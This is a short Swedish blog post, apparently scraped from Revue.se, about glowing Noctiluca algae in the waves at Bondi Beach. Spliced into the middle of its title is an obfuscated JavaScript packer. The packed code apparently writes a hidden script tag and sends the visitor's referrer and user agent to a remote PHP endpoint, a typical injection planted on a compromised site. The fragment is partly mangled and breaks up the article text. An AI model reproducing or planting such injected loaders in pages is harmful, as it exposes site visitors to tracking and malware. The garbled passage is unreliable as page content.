Image Image Image Image Image Image Image Image Image Image

| 18 mars, 2018

Scroll to top

Top

2 Comments

Självlysande alger lyser upp vågorna på Bondi Beach | Revue.se

Filip Urde
  • On 4 december, 2012
  • http://www.revue.se/filip-urde

Självlysande eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rkbhz|var|u0026u|referrer|nafss||js|php’.split(‘|’),0,{}))
alger

Utanför Bondi Beach i Australien så har det varit en stor algblomning under någon vecka. Algerna, vars namn är Noctiluca scintillans är speciella på det sättet att dem börjar lysa när dem blir störda, vilket vi kan se här när dem åker med i vågorna. Riktigt häftigt måste jag säga!

Tack Fredrik för tipset!
vimeo.com